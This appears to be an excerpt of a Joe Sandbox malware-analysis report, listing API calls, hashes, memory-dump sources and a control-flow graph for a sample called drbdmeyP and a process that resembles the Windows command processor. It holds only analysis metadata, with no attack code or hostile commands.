                                                                              • Instruction ID: 5c25edb19946727406606906c76980e1d10e687976c030b77a126e3da493f9c6
                                                                              • Opcode Fuzzy Hash: d10227275c7b6081de2ee05023da87eadddda2e83e478cb8004c91b3b4e22bf4
                                                                              • Instruction Fuzzy Hash: BD212774604209EFDB04CF94D884FAAB7BAFB48354F108569F9099F390D735EA41CB94
                                                                              APIs
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D058,00000000), ref: 00411EB4
                                                                              • malloc.MSVCRT ref: 00411EC4
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 00411EE1
                                                                              • malloc.MSVCRT ref: 00411EF6
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWidemalloc
                                                                              • String ID:
                                                                              • API String ID: 2735977093-0
                                                                              • Opcode ID: f99b9e9cc375a0f51ee550c492f080850f9660593670d0a959cc873830a669a1
                                                                              • Instruction ID: da1f4c5307a9808d3c7f8614f95932c7effa64efca2e052dfed00f08d58b5d3d
                                                                              • Opcode Fuzzy Hash: f99b9e9cc375a0f51ee550c492f080850f9660593670d0a959cc873830a669a1
                                                                              • Instruction Fuzzy Hash: FE012E3734030227E32066A6AC02FE77B49CB85B95F19407AFF005E2C1CAA3A8008A79
                                                                              APIs
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00411F51
                                                                              • malloc.MSVCRT ref: 00411F61
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00411F7B
                                                                              • malloc.MSVCRT ref: 00411F90
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWidemalloc
                                                                              • String ID:
                                                                              • API String ID: 2735977093-0
                                                                              • Opcode ID: 5325b0ad4490700c2010cf27b2c704082c058671d9b3d0b05cc6651335db68c7
                                                                              • Instruction ID: 2143df0fa8f9e7073c9e362d0ea50869445b156f554053f4d5fb65981249776a
                                                                              • Opcode Fuzzy Hash: 5325b0ad4490700c2010cf27b2c704082c058671d9b3d0b05cc6651335db68c7
                                                                              • Instruction Fuzzy Hash: AE01643738030037E3204A95AC02FA77B4DCBC5B95F19407AFB005E2C6CBB3A8018AB8
                                                                              APIs
                                                                              • RtlEnterCriticalSection.NTDLL(00000020), ref: 0040D443
                                                                              • RtlReAllocateHeap.NTDLL(00000008,?,?), ref: 0040D483
                                                                              • RtlLeaveCriticalSection.NTDLL(00000020), ref: 0040D4BE
                                                                                • Part of subcall function 0040DB12: RtlAllocateHeap.NTDLL(00000008,00000000,0040D38C), ref: 0040DB1E
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateCriticalHeapSection$EnterLeave
                                                                              • String ID:
                                                                              • API String ID: 3625150316-0
                                                                              • Opcode ID: be2f1553c835898b8f41ca660172eefbe6af4dd5fd6a89ea98a49a40f9a2ae85
                                                                              • Instruction ID: a304a92e3806a45bcf6d327fe86cdfb5e6d5534298f9acb62e815e22c79c963c
                                                                              • Opcode Fuzzy Hash: be2f1553c835898b8f41ca660172eefbe6af4dd5fd6a89ea98a49a40f9a2ae85
                                                                              • Instruction Fuzzy Hash: 30112B32604700AFC3208FA8EC40D56B7FAFF58765B15892AE996E36A0C734F804CB65
                                                                              APIs
                                                                              • GetWindowTextLengthW.USER32 ref: 00408EAA
                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00408EBF
                                                                              • GetWindowTextW.USER32(00000000,00000001), ref: 00408ECF
                                                                              • UnregisterClassW.USER32 ref: 00408EF3
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: TextWindow$AllocateClassHeapLengthUnregister
                                                                              • String ID:
                                                                              • API String ID: 1576658079-0
                                                                              • Opcode ID: ceb989c364a64a77ca9268f30e2f22e8c5aea8804ddba6594e2583a28b0bbdfa
                                                                              • Instruction ID: f973f4e0a74c58c8f3dc6b35f62902cd2ce24d79b6cf0357400b1c80f0f6dd69
                                                                              • Opcode Fuzzy Hash: ceb989c364a64a77ca9268f30e2f22e8c5aea8804ddba6594e2583a28b0bbdfa
                                                                              • Instruction Fuzzy Hash: 5011CE3100821AFBCB116F64FD0C9AA3F66EB18395B11C03AF949A22F4DA799951DB58
                                                                              APIs
                                                                              • RtlEnterCriticalSection.NTDLL(00000020), ref: 0040D68F
                                                                              • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D95E,00000000,00000000,?,00409E88,?,00000200,?,?,00409D8F,00000200), ref: 0040D6A6
                                                                              • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D95E,00000000,00000000,?,00409E88,?,00000200,?,?,00409D8F,00000200), ref: 0040D6C2
                                                                              • RtlLeaveCriticalSection.NTDLL(00000020), ref: 0040D6DF
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalFreeHeapSection$EnterLeave
                                                                              • String ID:
                                                                              • API String ID: 1298188129-0
                                                                              • Opcode ID: 53ceed24bb8d2d46dd7a9e67fb8799a8add0012f463c06b4e215cdce4978a367
                                                                              • Instruction ID: ccb09d183470463af25dc63fc94d1cebb037c249e32c06969674a21ae1653042
                                                                              • Opcode Fuzzy Hash: 53ceed24bb8d2d46dd7a9e67fb8799a8add0012f463c06b4e215cdce4978a367
                                                                              • Instruction Fuzzy Hash: BF017C75A0261AEFC7108F95E904967BBBCFF08750301843AE80897654C731E864CFE8
                                                                              APIs
                                                                                • Part of subcall function 004053EA: RtlEnterCriticalSection.NTDLL(004176A0), ref: 004053F5
                                                                                • Part of subcall function 004053EA: RtlLeaveCriticalSection.NTDLL(004176A0), ref: 00405428
                                                                              • TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405446
                                                                              • RtlEnterCriticalSection.NTDLL(004176A0), ref: 00405452
                                                                              • CloseHandle.KERNEL32(?,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000), ref: 00405472
                                                                              • RtlLeaveCriticalSection.NTDLL(004176A0), ref: 00405486
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$CloseHandleTerminateThread
                                                                              • String ID:
                                                                              • API String ID: 1388343586-0
                                                                              • Opcode ID: cbc7e9082fcaf871cf348277c49422a471ffdcec75b7c0d4283b3ed47ece0408
                                                                              • Instruction ID: e82d31de5584acb3c1822b09e6e690cbeb5bd259d621742d6e77904c892493b9
                                                                              • Opcode Fuzzy Hash: cbc7e9082fcaf871cf348277c49422a471ffdcec75b7c0d4283b3ed47ece0408
                                                                              • Instruction Fuzzy Hash: D4F0BE36904710EBC2205F60AC48BEB7B68EB44763726843BF80273190C738AC808E6E
                                                                              APIs
                                                                                • Part of subcall function 0040D288: TlsGetValue.KERNEL32(?,00409825), ref: 0040D28F
                                                                                • Part of subcall function 0040D288: RtlAllocateHeap.NTDLL(00000008), ref: 0040D2AA
                                                                                • Part of subcall function 0040D288: TlsSetValue.KERNEL32(00000000,?,?,00409825), ref: 0040D2B9
                                                                              • GetCommandLineW.KERNEL32(?,?,?,?,?,?,00409838,00000000), ref: 004096F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Value$AllocateCommandHeapLine
                                                                              • String ID: $"
                                                                              • API String ID: 565049335-3817095088
                                                                              • Opcode ID: f04578b7f77a2c145e5ce34ae7d790eae5d8f223c8674fef185d65dfd3ed14c9
                                                                              • Instruction ID: 4c648ba0253d95f00ea60fdf00931512a06ba22242bcbe44c620df30a2d3858e
                                                                              • Opcode Fuzzy Hash: f04578b7f77a2c145e5ce34ae7d790eae5d8f223c8674fef185d65dfd3ed14c9
                                                                              • Instruction Fuzzy Hash: 6031A473525221CADB749F24981137772A1EBB1B60F18817FE8926B3C2F37D8D419359
                                                                              APIs
                                                                                • Part of subcall function 0040A0BA: memset.MSVCRT ref: 0040A122
                                                                                • Part of subcall function 0040D8E6: RtlEnterCriticalSection.NTDLL(0041761C), ref: 0040D8FA
                                                                                • Part of subcall function 0040D8E6: HeapFree.KERNEL32(00000000,?,?,00409E88,?,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D948
                                                                                • Part of subcall function 0040D8E6: RtlLeaveCriticalSection.NTDLL(0041761C), ref: 0040D94F
                                                                              • HeapFree.KERNEL32(00000000,?,?,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E9A
                                                                              • HeapFree.KERNEL32(00000000,?,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409EA6
                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409EBA
                                                                              • HeapFree.KERNEL32(00000000,00000000,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409ED0
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                                              • String ID:
                                                                              • API String ID: 4254243056-0
                                                                              • Opcode ID: 2e2b091367acf3d98793c74670de9e011cac5a97bd1a707a8857b69d5b2dd878
                                                                              • Instruction ID: bfb960cb52ae9f1737c5edf5dab89cb24d0a80b98fb865d44a1203debf2c4dae
                                                                              • Opcode Fuzzy Hash: 2e2b091367acf3d98793c74670de9e011cac5a97bd1a707a8857b69d5b2dd878
                                                                              • Instruction Fuzzy Hash: 40F0FF31205609BFC6126F5AED40D57BF7DFF5A7983464136B404626B0C732EC619AA8

                                                                              Execution Graph

                                                                              Execution Coverage: 3.9%
                                                                              Dynamic/Decrypted Code Coverage: 0%
                                                                              Signature Coverage: 0%
                                                                              Total number of Nodes: 692
                                                                              Total number of Limit Nodes: 8

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: wcschr$Heap$AllocateProcessiswspacememsettowlowerwcsrchr
                                                                              • String ID: :$:$:$:ON$OFF
                                                                              • API String ID: 4076514806-467788257
                                                                              • Opcode ID: ec77655612b2197603e506f96a5fdd07df98b32b07624a2fc81e4f2603e93a28
                                                                              • Instruction ID: 062c506042b733e88d80f67e0759bc8add7f2d9b9b7fe230d8a2f9887a20aec4
                                                                              • Opcode Fuzzy Hash: ec77655612b2197603e506f96a5fdd07df98b32b07624a2fc81e4f2603e93a28
                                                                              • Instruction Fuzzy Hash: A4229F61B0C68286FA6CBF25D514278F6A1EF4DB81F489035CA2EC73B6DF7CA8458350

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale$DefaultLangUsersetlocale
                                                                              • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                              • API String ID: 2492766124-2236139042
                                                                              • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                              • Instruction ID: 44832ff68be2c04480b7a2949da4b05ee376eee70333b5088dc7bf236cedd6ed
                                                                              • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                              • Instruction Fuzzy Hash: D1F14861B0C78285EA29BF15E9102B9B6A5FF0CB80F948135CA2D977B6EF7CE505C350

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue$CloseOpensrandtime
                                                                              • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                              • API String ID: 145004033-3846321370
                                                                              • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                              • Instruction ID: b35f8e5d41a979be47100b425b46377644e029050b8589c824a39071be1b0cea
                                                                              • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                              • Instruction Fuzzy Hash: C0E16B7262DA82C6E664BF10F4405BAF7A0FB8D745F409135EA9E82A79DFBCD544CB00

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                              • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                              • API String ID: 2624720099-1920437939
                                                                              • Opcode ID: f14ccfe17658d03b7f0c6aedd8572f1845147b0a0877a5eeff18d3955b8dfa43
                                                                              • Instruction ID: 4e5c7b20361afcc95732d1d7fdfbba1c1994017da61cfc3b618c05ad45af3e82
                                                                              • Opcode Fuzzy Hash: f14ccfe17658d03b7f0c6aedd8572f1845147b0a0877a5eeff18d3955b8dfa43
                                                                              • Instruction Fuzzy Hash: 34C18971B0C642CAF718BF64E4442B8FAA5EF4D754F148138DA2ED66B3DEBCA4418B00

                                                                              Control-flow Graph

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                              • Instruction ID: e15933c34eedb63348197d36623cb427ab5788f76587144726410b0c8c809c5e
                                                                              • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                              • Instruction Fuzzy Hash: 02510861B0C682C6EA34BF15E5442BAE291FB59BA0F588230DE7D876F2DF7CE4418600
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00007FF64B567DA1
                                                                                • Part of subcall function 00007FF64B57417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF64B5741AD
                                                                                • Part of subcall function 00007FF64B56D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF64B56D46E
                                                                                • Part of subcall function 00007FF64B56D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF64B56D485
                                                                                • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D4EE
                                                                                • Part of subcall function 00007FF64B56D3F0: iswspace.MSVCRT ref: 00007FF64B56D54D
                                                                                • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D569
                                                                                • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D58C
                                                                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF64B567EB7
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                                                              • String ID:
                                                                              • API String ID: 168394030-0
                                                                              • Opcode ID: b5165ffa2db6ef7b8d8da3c0ab750a736ff1024e17944bcf39a6df9fca352c0d
                                                                              • Instruction ID: 37d23bb1ee9afc14ebb7101d34014a149fd39b34cb5805263577405a6b6f32ea
                                                                              • Opcode Fuzzy Hash: b5165ffa2db6ef7b8d8da3c0ab750a736ff1024e17944bcf39a6df9fca352c0d
                                                                              • Instruction Fuzzy Hash: E9A1C421B0C64285FB69BF26D4502B9A3A1BF8C784F449135DE2EC7AF6DF7CA9458700
                                                                              APIs
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF64B56B9A1,?,?,?,?,00007FF64B56D81A), ref: 00007FF64B56CDA6
                                                                              • RtlAllocateHeap.NTDLL(?,?,?,00007FF64B56B9A1,?,?,?,?,00007FF64B56D81A), ref: 00007FF64B56CDBD
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocateProcess
                                                                              • String ID:
                                                                              • API String ID: 1357844191-0
                                                                              • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                              • Instruction ID: 488b87ff52c47a56c4fed9b24cfaf6cb0d0e2be0b037e6c687a91461fb11cfd0
                                                                              • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                              • Instruction Fuzzy Hash: 6AF06932A1C642C2EA48BF05F840078FBB0FB8DB01B589035DA6E833B6CF3CA545CA00

                                                                              Control-flow Graph
                                                                              control_flow_graph 331 7ff64b574d5c-7ff64b574e4b InitializeCriticalSection call 7ff64b5758e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff64b570580 call 7ff64b574a14 call 7ff64b574ad0 call 7ff64b575554 GetCommandLineW 342 7ff64b574e4d-7ff64b574e54 331->342 342->342 343 7ff64b574e56-7ff64b574e61 342->343 344 7ff64b574e67-7ff64b574e7b call 7ff64b572e44 343->344 345 7ff64b5751cf-7ff64b5751e3 call 7ff64b563278 call 7ff64b574c1c 343->345 351 7ff64b5751ba-7ff64b5751ce call 7ff64b563278 call 7ff64b574c1c 344->351 352 7ff64b574e81-7ff64b574ec3 GetCommandLineW call 7ff64b5713e0 call 7ff64b56ca40 344->352 351->345 352->351 362 7ff64b574ec9-7ff64b574ee8 call 7ff64b57417c call 7ff64b572394 352->362 366 7ff64b574eed-7ff64b574ef5 362->366 366->366 367 7ff64b574ef7-7ff64b574f1f call 7ff64b56aa54 366->367 370 7ff64b574f95-7ff64b574fee GetConsoleOutputCP GetCPInfo call 7ff64b5751ec GetProcessHeap HeapAlloc 367->370 371 7ff64b574f21-7ff64b574f30 367->371 376 7ff64b575012-7ff64b575018 370->376 377 7ff64b574ff0-7ff64b575006 GetConsoleTitleW 370->377 371->370 373 7ff64b574f32-7ff64b574f39 371->373 373->370 375 7ff64b574f3b-7ff64b574f77 call 7ff64b563278 GetWindowsDirectoryW 373->375 384 7ff64b574f7d-7ff64b574f90 call 7ff64b573c24 375->384 385 7ff64b5751b1-7ff64b5751b9 call 7ff64b574c1c 375->385 380 7ff64b57507a-7ff64b57507e 376->380 381 7ff64b57501a-7ff64b575024 call 7ff64b573578 376->381 377->376 379 7ff64b575008-7ff64b57500f 377->379 379->376 386 7ff64b5750eb-7ff64b575161 GetModuleHandleW GetProcAddress * 3 380->386 387 7ff64b575080-7ff64b5750b3 call 7ff64b58b89c call 7ff64b56586c call 7ff64b563240 call 7ff64b573448 380->387 381->380 397 7ff64b575026-7ff64b575030 381->397 384->370 385->351 389 7ff64b575163-7ff64b575167 386->389 390 7ff64b57516f 386->390 412 7ff64b5750b5-7ff64b5750d0 call 7ff64b573448 * 2 387->412 413 7ff64b5750d2-7ff64b5750d7 call 7ff64b563278 387->413 389->390 395 7ff64b575169-7ff64b57516d 389->395 396 7ff64b575172-7ff64b5751af free call 7ff64b578f80 390->396 395->390 395->396 401 7ff64b575075 call 7ff64b58cff0 397->401 402 7ff64b575032-7ff64b575059 GetStdHandle GetConsoleScreenBufferInfo 397->402 401->380 405 7ff64b57505b-7ff64b575067 402->405 406 7ff64b575069-7ff64b575073 402->406 405->380 406->380 406->401 417 7ff64b5750dc-7ff64b5750e6 GlobalFree 412->417 413->417 417->386
                                                                              APIs
                                                                              • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574D9A
                                                                                • Part of subcall function 00007FF64B5758E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF64B58C6DB), ref: 00007FF64B5758EF
                                                                              • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574DBB
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B574DCA
                                                                              • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574DE0
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B574DEE
                                                                              • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF64B574E04
                                                                                • Part of subcall function 00007FF64B570580: _get_osfhandle.MSVCRT ref: 00007FF64B570589
                                                                                • Part of subcall function 00007FF64B570580: SetConsoleMode.KERNELBASE ref: 00007FF64B57059E
                                                                                • Part of subcall function 00007FF64B570580: _get_osfhandle.MSVCRT ref: 00007FF64B5705AF
                                                                                • Part of subcall function 00007FF64B570580: GetConsoleMode.KERNELBASE ref: 00007FF64B5705C5
